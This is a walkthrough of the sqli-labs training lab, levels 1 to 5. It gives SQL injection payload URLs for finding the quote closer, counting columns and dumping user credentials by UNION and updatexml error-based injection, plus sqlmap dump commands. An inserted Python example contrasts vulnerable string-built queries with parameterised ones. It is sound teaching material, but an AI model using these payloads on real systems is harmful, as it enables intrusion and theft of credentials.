sqli-labs (Less-1 to Less-5) walkthrough
Less-1
Method 1: manual injection
1. Determine the closing character
http://localhost/sqli-labs/Less-1/?id=1' and 1=1 --+ //normal
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+ //error
2. Determine the number of columns
http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+ //normal
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+ //error
order by 3 succeeds and order by 4 fails, so the query returns three columns
3. Find the echo positions
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+
4. Get the database name
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+
5. List the tables
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 --+
6. List the columns of the users table
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3 --+
7. Dump the username and password data from the users table
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(username,0x7e,password) from users),3 --+
Method 2: tool-based injection
1. List the databases with sqlmap
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --dbs
Show the current database
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --current-db
2. List the tables in security
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --tables -D security
3. Dump the data in users
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --dump -D security -T users
Less-2
Level 2 is a numeric injection (no quotes around id); the procedure is the same as in level 1.
Method 1: manual injection
1. Determine the closing character
http://localhost/sqli-labs/Less-2/?id=1 and 1=1 --+ //normal
http://localhost/sqli-labs/Less-2/?id=1 and 1=2 --+ //error
The remaining steps are identical to Less-1 and are not repeated here.
Method 2: tool-based injection
Same as for Less-1
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-2/?id=1" --batch --dump -D security -T users
Less-3
Method 1: manual injection
1. Determine the closing character
http://localhost/sqli-labs/Less-3/?id=1') and 1=1 --+ //normal
http://localhost/sqli-labs/Less-3/?id=1') and 1=2 --+ //error
2. Determine the number of columns
http://localhost/sqli-labs/Less-3/?id=1') order by 3 --+
http://localhost/sqli-labs/Less-3/?id=1') order by 4 --+
3. Find the echo positions
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+
4. Get the database name
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,database(),3 --+
5. List the tables
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
6. List the columns of the users table
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users" --+
7. Dump the data in the users table
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(username,0x7e,password),3 from users --+
Method 2: tool-based injection
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-3/?id=1" --batch -D security -T users --dump
Less-4
Method 1: manual injection
http://localhost/sqli-labs/Less-4/?id=1") and 1=1 --+ //normal
http://localhost/sqli-labs/Less-4/?id=1") and 1=2 --+ //error
The rest follows the same steps as the first three levels; see Less-1 and Less-2.
Method 2: tool-based injection
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-4/?id=1" --batch -D security -T users --dump
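The closing-character probe in step 1 differs from level to level because each level wraps id in a different way. The following added example (not part of the original walkthrough or of sqli-labs) assumes the query templates shown in WRAPPERS, uses sqlite3 in place of MySQL and constructed rows in place of the real users table, and replays the step-7 union query against each template next to the parameterised form that stops it:

```python
import sqlite3

# Constructed rows standing in for sqli-labs' security.users table; sqlite3
# stands in for MySQL, so updatexml() error injection (Less-5) is out of scope.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]

# Assumed query templates, one per level. This is why the closer changes:
# ' for Less-1, nothing for Less-2, ') for Less-3, ") for Less-4 (the
# double-quote form depends on sqlite treating an unresolved "..." as a
# string literal, so it is listed but not exercised below).
WRAPPERS = {
    "Less-1": "SELECT * FROM users WHERE id='{id}' LIMIT 0,1",
    "Less-2": "SELECT * FROM users WHERE id={id} LIMIT 0,1",
    "Less-3": "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1",
    "Less-4": 'SELECT * FROM users WHERE id=("{id}") LIMIT 0,1',
}

# Step 7 of the walkthrough with each level's closer in front; the space
# after "--" is what the URL form --+ decodes to (MySQL requires it).
INJECTED = "union select 1,(select group_concat(username||'~'||password) from users),3 -- "
PAYLOADS = {
    "Less-1": "-1' " + INJECTED,
    "Less-2": "-1 " + INJECTED,
    "Less-3": "-1') " + INJECTED,
    "Less-4": '-1") ' + INJECTED,
}


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def vulnerable_lookup(level, user_id):
    """String substitution, as the lab does it. None means the database
    rejected the SQL: the 'error' response the closing probe looks for."""
    try:
        return _db().execute(WRAPPERS[level].format(id=user_id)).fetchall()
    except sqlite3.OperationalError:
        return None


def hardened_lookup(user_id):
    """Parameterised form: the input is bound as a value, never parsed as SQL."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return _db().execute(sql, (user_id,)).fetchall()
```

With the wrong closer (the Less-1 payload against the Less-3 template) the SQL no longer parses, which is the error response that tells step 1 to try the next candidate; with a bound parameter the same string simply matches no row.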
Less-5
Method 1: manual injection
1. Determine the closing character
http://localhost/sqli-labs/Less-5/?id=1' and 1=1 --+ //normal
http://localhost/sqli-labs/Less-5/?id=1' and 1=2 --+ //error
2. Determine the number of columns
http://localhost/sqli-labs/Less-5/?id=1' order by 4 --+ //error
http://localhost/sqli-labs/Less-5/?id=1' order by 3 --+ //normal
So the query returns 3 columns
3. Check for echo positions
There is no echo position, so we try error-based injection instead
4. Error-based injection: get the database name
http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,database()),3)--+
5. List the tables
http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(table_name) from information_schema.tables where table_schema="security") )),3)--+
6. List the column names in users
http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users") )),3)--+
7. Dump the username and password data from users
http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(username,0x7e,password) from users) )),3)--+
Add a limit clause to the subquery to view each row one at a time.
Method 2: tool-based injection
sqlmap can dump the data in the users table directly; see Less-1 for the exact steps.
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-5/?id=1" --batch -D security -T users --dump
PS: more tutorials will follow, stay tuned.